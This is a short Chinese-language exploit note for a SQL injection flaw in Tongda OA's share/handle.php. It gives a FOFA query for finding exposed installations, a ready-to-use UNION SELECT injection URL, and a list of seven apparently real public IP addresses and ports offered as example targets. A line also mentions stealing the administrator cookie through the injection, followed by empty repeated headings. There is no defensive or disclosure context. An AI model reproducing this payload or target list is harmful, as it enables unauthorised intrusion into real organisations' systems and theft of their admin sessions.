通达oasharehandle.phpsql注入漏洞

fofa

app="TDXK-通达OA"

poc

http://60.190.185.74:88/share/handle.php?_GET[module]=1'+and+1={%60='%60+1}+and+1=0+union+select+(select/**/version())--+%27

例子

http://1.202.216.130:3199/share/handle.php?_GET[module]=1''
http://120.76.73.200:70/share/handle.php?_GET[module]=1''
http://124.88.210.76:888/share/handle.php?_GET[module]=1''
http://183.250.243.227:8001/share/handle.php?_GET[module]=1''
http://218.16.142.55:8888/share/handle.php?_GET[module]=1''
http://218.70.17.86:88/share/handle.php?_GET[module]=1''
http://60.190.185.74:88/share/handle.php?_GET[module]=1''

通过sql注入获取管理员cookie

fofa​

poc​

例子​

fofa

poc

例子